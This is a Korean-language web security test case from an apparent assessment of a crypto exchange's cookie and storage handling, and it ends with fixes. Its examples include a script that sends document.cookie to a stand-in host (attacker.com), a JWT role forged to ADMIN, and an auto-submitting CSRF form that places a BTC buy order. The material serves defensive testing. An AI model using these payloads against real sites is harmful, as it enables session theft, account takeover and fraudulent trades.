================================================================================
[VCE-EX-15] 쿠키 및 웹스토리지 조작 가능성
도메인: exchange
위험도: High
================================================================================

1. 진단 항목 개요
--------------------------------------------------------------------------------
쿠키 및 웹스토리지 조작 가능성 진단은 클라이언트 측에 저장되는 인증 토큰 및
민감 정보가 적절한 보안 속성 없이 저장되어 있어 공격자가 탈취 또는 조작할 수
있는지를 확인하는 테스트이다.

VCE 거래소는 OAuth2 소셜 로그인 흐름에서 vce_token이라는 쿠키를 사용하는
것으로 확인된다. OAuth2SuccessHandler.java에서 이 쿠키를 생성하는 과정에서
Secure, HttpOnly, SameSite 속성이 누락되어 있을 경우:

  - HttpOnly 미설정: JavaScript(XSS)로 쿠키 내 토큰 탈취 가능
  - Secure 미설정: HTTP 구간에서 네트워크 도청으로 쿠키 탈취 가능
  - SameSite 미설정: CSRF 공격으로 쿠키가 타 사이트에서 자동 전송

또한 localStorage나 sessionStorage에 JWT 또는 비밀번호가 평문으로 저장될
경우, XSS 공격 한 번으로 모든 인증 정보가 탈취된다.

진단 목표:
  - vce_token 쿠키의 Secure, HttpOnly, SameSite 속성 확인
  - localStorage / sessionStorage에 민감 정보 저장 여부 확인
  - 쿠키 값 직접 조작으로 권한 상승 가능 여부 확인
  - SameSite=None이면서 Secure 미설정 여부 확인

위험 시나리오:
  1. XSS 취약점 + HttpOnly 미설정 → document.cookie로 vce_token 탈취
  2. HTTP 연결 도청 + Secure 미설정 → 쿠키 스니핑으로 토큰 획득
  3. CSRF + SameSite 미설정 → 로그인된 사용자의 주문 API 요청 위조
  4. localStorage에서 JWT 탈취 → 계정 완전 탈취


2. 대상 기능 & 엔드포인트
--------------------------------------------------------------------------------
쿠키 관련 엔드포인트:
  - POST /api/auth/login              → 로그인 후 쿠키 설정 확인
  - GET  /oauth2/authorization/**     → OAuth2 로그인 시작
  - GET  /login/oauth2/code/**        → OAuth2 콜백 (vce_token 쿠키 설정)
  - GET  /api/auth/logout             → 로그아웃 후 쿠키 삭제 확인

관련 코드:
  - OAuth2SuccessHandler.java:43-55   → vce_token 쿠키 생성 로직

테스트 도구:
  - Browser DevTools > Application > Cookies
  - Browser DevTools > Application > Local Storage
  - Browser DevTools > Application > Session Storage
  - Browser DevTools > Console (JavaScript 실행)
  - Burp Suite > HTTP history (응답 헤더 Set-Cookie 분석)

테스트 계정:
  - test@vce.com / test1234 (일반 로그인)
  - Google/Kakao OAuth2 계정 (소셜 로그인)


3. 취약점 원리 (Why this works)
--------------------------------------------------------------------------------
[HttpOnly 미설정의 위험]
  쿠키에 HttpOnly 속성이 없을 경우 JavaScript에서 접근 가능하다.
  XSS(Cross-Site Scripting) 취약점과 결합되면:
    // 공격자 스크립트
    var token = document.cookie;  // vce_token=eyJhbGci... 탈취
    fetch('https://attacker.com/steal?cookie=' + token);

  HttpOnly가 설정된 경우 document.cookie로 접근 불가 (안전)

[Secure 미설정의 위험]
  Secure 속성이 없으면 HTTP(비암호화) 연결에서도 쿠키가 전송된다.
  공공 Wi-Fi 등 네트워크 도청 환경에서 쿠키가 평문으로 노출된다.
  HTTPS만 사용하더라도 Mixed Content 요청에서 전송될 수 있다.

[SameSite 미설정의 위험]
  SameSite 속성이 없거나 None으로 설정된 경우 CSRF 공격이 가능하다:
  - 공격자 사이트에서 VCE의 인증이 필요한 API로 폼 제출
  - 피해자 브라우저가 자동으로 vce_token 쿠키를 포함하여 전송
  - VCE 서버는 정상 요청으로 처리

  SameSite=Lax (권장): GET만 자동 전송, POST는 차단
  SameSite=Strict (강력): 모든 크로스사이트 요청에서 전송 차단
  SameSite=None: Secure과 함께 사용해야 하며, 크로스사이트에서 전송

[localStorage의 위험]
  localStorage에 저장된 데이터는:
  - 브라우저를 닫아도 유지됨 (sessionStorage와 달리)
  - 동일 오리진의 모든 JavaScript에서 접근 가능
  - XSS 공격으로 즉시 탈취 가능:
    localStorage.getItem('accessToken')  // JWT 토큰 탈취
    localStorage.getItem('userInfo')     // 사용자 정보 탈취


4. 테스트 절차 (Step-by-step)
--------------------------------------------------------------------------------

[Step 1] 로그인 후 Set-Cookie 응답 헤더 분석

  1-1. Burp Suite에서 로그인 요청/응답 캡처
  --- HTTP Request ---
  POST /api/auth/login HTTP/1.1
  Host: localhost:8080
  Content-Type: application/json

  {"email":"test@vce.com","password":"test1234"}
  --------------------

  취약한 응답 예시 (속성 미설정):
  HTTP/1.1 200 OK
  Set-Cookie: vce_token=eyJhbGciOiJIUzI1NiJ9.xxx; Path=/
  (Secure, HttpOnly, SameSite 속성 없음 → 즉시 취약 판정)

  안전한 응답 예시:
  HTTP/1.1 200 OK
  Set-Cookie: vce_token=eyJhbGciOiJIUzI1NiJ9.xxx; Path=/; HttpOnly; Secure; SameSite=Lax

  1-2. OAuth2 로그인 후 쿠키 확인
  소셜 로그인 흐름 완료 후 OAuth2SuccessHandler.java에서 설정한 쿠키 확인:
  --- HTTP Response (예상) ---
  HTTP/1.1 302 Found
  Location: http://localhost:5173/dashboard
  Set-Cookie: vce_token=eyJhbGciOiJIUzI1NiJ9...; Path=/
  (HttpOnly, Secure, SameSite 속성 확인)

[Step 2] Browser DevTools로 쿠키 속성 상세 확인

  2-1. 브라우저에서 로그인 수행
  2-2. F12 (DevTools) > Application 탭 > Cookies > http://localhost:5173
  2-3. vce_token 쿠키 항목에서 다음 컬럼 확인:
    - HttpOnly 컬럼: 체크 여부
    - Secure 컬럼: 체크 여부
    - SameSite 컬럼: 값 (Strict / Lax / None / 빈값)
    - Expires 컬럼: 만료 시간 적절성

  2-4. JavaScript 콘솔에서 쿠키 접근 테스트:
  (DevTools Console 탭에서 실행)

  document.cookie
  → vce_token이 포함되면 HttpOnly 미설정 → 취약
  → 빈 문자열이거나 vce_token이 없으면 HttpOnly 설정됨 → 안전

[Step 3] localStorage / sessionStorage 민감 정보 저장 여부 확인

  3-1. DevTools > Application > Local Storage > http://localhost:5173
  3-2. 저장된 키-값 목록 전체 확인:

  확인할 민감 데이터 키 목록:
    - accessToken
    - refreshToken
    - token
    - jwt
    - userInfo
    - email
    - password  (절대 저장 금지)
    - privateKey
    - walletAddress
    - balance

  3-3. Console에서 직접 확인:
  localStorage.getItem('accessToken')
  localStorage.getItem('token')
  Object.keys(localStorage)  // 모든 키 목록 출력
  JSON.stringify(localStorage)  // 전체 내용 출력

  sessionStorage.getItem('accessToken')
  Object.keys(sessionStorage)

[Step 4] 쿠키 값 직접 조작으로 권한 상승 시도

  4-1. DevTools > Application > Cookies에서 vce_token 값 수정
  4-2. 일반 사용자 토큰을 디코딩하여 role 확인 (jwt.io 사용):
       일반 사용자 토큰 페이로드 예시:
       {"sub": "test@vce.com", "role": "USER", "exp": 1234567890}

  4-3. jwt.io 또는 직접 수정으로 role을 ADMIN으로 변경:
       수정된 페이로드: {"sub": "test@vce.com", "role": "ADMIN", "exp": 1234567890}
       ※ 서명 없이 수정된 토큰으로 ADMIN API 접근 시도

  4-4. 수정된 토큰으로 관리자 API 호출:
  --- HTTP Request ---
  GET /api/admin/members HTTP/1.1
  Host: localhost:8080
  Cookie: vce_token=MODIFIED_TOKEN_WITH_ADMIN_ROLE
  --------------------
  (서버가 서명 검증 없이 role 값을 신뢰하면 취약)

[Step 5] SameSite=None + Secure 미설정 확인

  5-1. 쿠키의 SameSite 속성이 None인지 확인
  5-2. SameSite=None이면서 Secure 미설정 시 CSRF 가능성 확인

  CSRF 테스트 HTML (공격자 페이지):
  <!DOCTYPE html>
  <html>
  <body>
    <form action="http://localhost:8080/api/orders" method="POST" id="csrf-form">
      <input type="hidden" name="type" value="BUY">
      <input type="hidden" name="amount" value="1000000">
      <input type="hidden" name="currency" value="BTC">
    </form>
    <script>document.getElementById('csrf-form').submit();</script>
  </body>
  </html>
  → 피해자가 로그인 상태에서 이 페이지를 방문하면 자동으로 주문 요청 전송

[Step 6] 쿠키 삭제 후 접근 가능 여부 (세션 무효화)

  6-1. 로그인 후 vce_token 쿠키 값 복사
  6-2. 로그아웃 수행
  6-3. 로그아웃 후 수동으로 복사한 쿠키 값 다시 설정:
       DevTools > Cookies > vce_token > 값 수동 입력
  6-4. 인증이 필요한 API 호출:
  --- HTTP Request ---
  GET /api/orders HTTP/1.1
  Host: localhost:8080
  Cookie: vce_token=LOGGED_OUT_TOKEN_VALUE
  --------------------
  → 로그아웃된 토큰이 여전히 유효하면 취약 (서버 측 세션 무효화 미구현)


5. 취약 여부 판단 기준
--------------------------------------------------------------------------------

✅ 취약 (다음 중 하나라도 해당되면 취약)
  - Set-Cookie 응답에 HttpOnly 속성 없음
    → document.cookie로 vce_token 접근 가능 확인 시
  - Set-Cookie 응답에 Secure 속성 없음 (HTTP 연결에서도 쿠키 전송)
  - Set-Cookie 응답에 SameSite 속성 없음 또는 SameSite=None (Secure 미설정)
  - localStorage 또는 sessionStorage에 JWT, 비밀번호 등 민감 정보 평문 저장
  - 쿠키 role 값을 서버가 서명 검증 없이 신뢰하여 권한 상승 성공
  - 로그아웃 후 이전 토큰이 여전히 유효 (서버 측 무효화 미구현)

✗ 안전 (다음 조건이 모두 충족되어야 안전)
  - vce_token 쿠키: HttpOnly; Secure; SameSite=Lax 모두 설정
  - document.cookie에서 vce_token 접근 불가 확인
  - localStorage에 JWT, 비밀번호 등 민감 정보 미저장
  - 쿠키 조작 시 서버에서 서명 검증으로 위조 탐지
  - 로그아웃 후 이전 토큰 재사용 시 401 반환 (서버 측 블랙리스트)


6. 예상 취약 포인트 (코드 위치)
--------------------------------------------------------------------------------
  핵심 취약 파일: OAuth2SuccessHandler.java:43-55

  취약 코드 패턴 (예상):
    // OAuth2SuccessHandler.java 약 43-55번째 줄
    @Override
    public void onAuthenticationSuccess(HttpServletRequest request,
                                        HttpServletResponse response,
                                        Authentication authentication) throws IOException {
        String token = jwtTokenProvider.createToken(userEmail, role);

        // ↓ 취약: Secure, HttpOnly, SameSite 속성 없음
        Cookie cookie = new Cookie("vce_token", token);
        cookie.setPath("/");
        cookie.setMaxAge(60 * 60 * 24);  // 24시간
        // cookie.setHttpOnly(true);   ← 누락
        // cookie.setSecure(true);     ← 누락
        // SameSite 설정 방법 없음 (Java Cookie API 미지원, 헤더 직접 설정 필요)
        response.addCookie(cookie);

        // Line 55: 리다이렉트
        response.sendRedirect(redirectUri);
    }

  프론트엔드 취약 패턴 (예상, React):
    // authSlice.js 또는 useAuth.js
    localStorage.setItem('accessToken', response.data.accessToken);
    // ↑ localStorage에 JWT 저장 → XSS로 탈취 가능


7. 권고 조치
--------------------------------------------------------------------------------
[단기 조치]
  1. vce_token 쿠키 보안 속성 설정
     OAuth2SuccessHandler.java 수정:
       // Java Cookie API는 SameSite 미지원 → 응답 헤더 직접 설정
       String cookieHeader = String.format(
           "vce_token=%s; Path=/; HttpOnly; Secure; SameSite=Lax; Max-Age=%d",
           token, 60 * 60 * 24
       );
       response.setHeader("Set-Cookie", cookieHeader);

  2. localStorage에서 JWT 제거
     - JWT를 메모리(React state, Redux store)에만 저장
     - 페이지 새로고침 시 쿠키에서 재발급하는 방식으로 변경

  3. 로그아웃 시 서버 측 토큰 무효화
     - Redis 블랙리스트에 로그아웃된 JWT 등록
     - 모든 API 요청에서 블랙리스트 확인

[중장기 조치]
  4. CSP(Content Security Policy) 헤더 설정
     - XSS 공격 자체를 차단하여 쿠키 탈취 시도 무력화
     Content-Security-Policy: default-src 'self'; script-src 'self'

  5. CSRF 토큰 도입 (SameSite만으로 부족한 경우)
     - Double Submit Cookie 패턴 또는 Synchronizer Token 패턴 구현

  6. 토큰 만료 시간 최소화
     - Access Token: 15분
     - Refresh Token: 7일 (HttpOnly 쿠키로만 전달)
